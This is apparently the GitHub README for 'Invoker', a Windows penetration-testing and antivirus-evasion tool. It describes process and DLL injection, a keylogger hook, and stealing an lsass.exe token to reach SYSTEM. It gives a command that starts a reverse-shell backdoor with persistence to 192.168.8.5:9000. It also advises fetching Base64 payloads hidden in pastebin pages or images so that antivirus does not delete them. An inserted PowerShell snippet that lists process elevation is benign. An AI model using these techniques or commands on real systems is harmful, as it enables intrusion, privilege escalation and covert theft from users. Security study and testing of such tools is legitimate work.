About the developer

ivan-sincek
248 Stars 66 Forks MIT License 6 Commits 0 Opened issues

Invoker

Penetration testing utility and antivirus assessment tool.

Built with Visual Studio Community 2019 v16.10.2 (64-bit) and tested on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

The executables in this repository have started to be flagged by known antivirus signatures, and I don't have time to upload new builds each time, so you should compile this project yourself.

Learn more about process injection techniques from this article.

Future plans:

  • ~~process hollowing,~~
  • process doppelgänging,
  • process herpaderping,
  • process ghosting,
  • DLL proxying,
  • COM hijacking.

Table of Contents

Invoker Library

Features:

  • invoke the system shells,
  • ~~make direct system calls,~~
  • use Windows Management Instrumentation (WMI),
  • connect to a remote host,
  • terminate a running process,
  • run a new process,
  • dump the memory of a process,
  • tamper with the executable image of a process,
  • inject bytecode into a process,
  • inject DLL into a process,
  • list loaded DLLs of a process,
  • install a hook procedure,
  • enable access token privileges,
  • duplicate the access token of a process and run a new process,
  • download a file,
  • add/edit a registry key,
  • schedule a task,
  • list unquoted service paths and start, stop, or restart a service,
  • replace multiple System32 files.

Some features may require administrative privileges.

Check the Invoker library here. Feel free to use it!

How to Run

Run Invoker_x86.exe (32-bit) or Invoker_x64.exe (64-bit).

To automate the reverse shell backdoor while adding persistence, run the following command:

Invoker_x64.exe 192.168.8.5:9000

32-bit Invoker can:

  • ~~make direct system calls,~~
  • dump the memory of a 32-bit process,
  • tamper with the executable image of a 32-bit process,
  • inject 32-bit bytecode into a 32-bit process,
  • inject 32-bit DLL into a 32-bit process,
  • list loaded DLLs of a 32-bit process,
  • install a hook procedure from a 32-bit DLL.

64-bit Invoker can:

  • make direct system calls,
  • dump the memory of a 32-bit process,
  • dump the memory of a 64-bit process,
  • ~~tamper with the executable image of a 32-bit process,~~
  • tamper with the executable image of a 64-bit process,
  • inject 32-bit bytecode into a 32-bit process,
  • inject 64-bit bytecode into a 64-bit process,
  • ~~inject 32-bit DLL into a 32-bit process,~~
  • inject 64-bit DLL into a 64-bit process,
  • ~~list loaded DLLs of a 32-bit process,~~
  • list loaded DLLs of a 64-bit process,
  • ~~install a hook procedure from a 32-bit DLL,~~
  • install a hook procedure from a 64-bit DLL.

Bytecode Injection

Elevate privileges by injecting bytecode into a higher-privileged process.

This tool can download the content of a binary file into memory and inject it into a running process. It can also parse an HTTP response and extract the payload from a custom element, e.g. from payload, where payload is binary code encoded in Base64.

Check the example at pastebin.com/raw/xf9Trt0d.

This is useful if antivirus is constantly deleting your local payloads.

Also, check an additional example at pastebin.com/raw/iW17rCxH - payload hidden in the image element.

P.S. Bytecodes provided will most certainly not work for you.

Use ngrok to give your local web server a public address.


To see if a process is 32-bit or 64-bit, open Task Manager, click on More details, go to the Details tab, right-click on any of the columns, click on Select columns and check the Platform checkbox.

To see if a process is running with administrative privileges, check the Elevated checkbox in the same dialog.
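As an added example that is not part of the Invoker project, the following PowerShell snippet produces the same Platform and Elevated information that the two Task Manager columns show, which is useful when auditing which elevated processes are running on a host. It assumes a 64-bit Windows OS and an elevated session so that handles to other users' processes can be opened; processes that refuse a handle are skipped.

```powershell
# Added example (not Invoker code): list Platform and Elevated for every process,
# the same columns Task Manager exposes under Details -> Select columns.
$procInfoSource = @'
using System;
using System.Runtime.InteropServices;
public static class ProcInfo {
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr hProcess, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool GetTokenInformation(IntPtr hToken, int infoClass, out uint info, uint len, out uint retLen);
    [DllImport("kernel32.dll")]
    static extern bool CloseHandle(IntPtr h);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64);
    const uint TOKEN_QUERY = 0x0008;
    const int TokenElevation = 20;   // TOKEN_INFORMATION_CLASS value for TokenElevation
    // Returns true/false, or null when the process token cannot be queried.
    public static bool? IsElevated(IntPtr hProcess) {
        IntPtr hToken;
        if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return null;
        try {
            uint elevated, retLen;
            if (!GetTokenInformation(hToken, TokenElevation, out elevated, 4, out retLen)) return null;
            return elevated != 0;
        } finally { CloseHandle(hToken); }
    }
}
'@
Add-Type -TypeDefinition $procInfoSource

Get-Process | ForEach-Object {
    $p = $_
    # Protected processes (and, without admin, other users' processes) refuse a handle: skip them.
    try { $h = $p.Handle } catch { return }
    $wow64 = $false
    # On a 64-bit OS a process running under WOW64 is the 32-bit one.
    $platform = if ([ProcInfo]::IsWow64Process($h, [ref]$wow64) -and $wow64) { '32-bit' } else { '64-bit' }
    $elevated = [ProcInfo]::IsElevated($h)
    [pscustomobject]@{
        Id       = $p.Id
        Name     = $p.ProcessName
        Platform = $platform
        Elevated = if ($null -eq $elevated) { 'unknown' } else { $elevated }
    }
} | Format-Table -AutoSize
```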

Note that different injection techniques have both pros and cons: some techniques require fewer access rights or use less suspicious methods, but they may crash the target process or need time or special conditions before the payload executes.

Generate a Reverse Shell Payload

Find out how to generate a reverse shell payload, as well as how to set up Ncat and multi/handler listeners, from my other project.

Sometimes bytecode may fail because of bad characters, wrong exit function, or encoding. DLL injection is more reliable.

PowerShell

If you wish to run a PowerShell reverse or bind shell from the Invoker, check my other project.

Just copy and paste any of the one-liners to your PowerShell session.

Direct System Calls

Direct system calls library and assembly were generated with SysWhispers2. Credits to the author! As of this writing, this tool only supports 64-bit direct system calls.

Features:

  • terminate a running process,
  • inject bytecode into a process,
  • inject DLL into a process.

To generate the same library and assembly, run the following command from your preferred console:

python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -o syscalls

Check my wrapper around the library here. Feel free to use it!

Make a DLL With a Hook Procedure

Check the simple DLL with a hook procedure here. The hook procedure will invoke a message box on each window close.

Check the keyboard hook procedure (i.e. keylogger) here.

Check the mouse hook procedure that will run a new process on the first mouse click here.

Don't forget to remove all the created artifacts after you are done testing, e.g. remove keylogger.log, etc.

Get the LocalSystem Account (NT AUTHORITY\SYSTEM)

Follow these simple steps:

  1. Run the Invoker as administrator.

  2. Enable all access token privileges.

  3. Duplicate the access token from e.g. Local Security Authority Subsystem Service (lsass.exe) and run a new instance of the Invoker.

  4. Within the new Invoker instance, open the Command Prompt and run whoami; you should now see nt authority\system.

  5. Enable all access token privileges once again.

  6. Close the old Invoker instance.

Images

Figure 1 - Invoker

Figure 2 - Add/Edit Registry Key

Figure 3 - Bytecode Injection

Figure 4 - Elevated Privileges
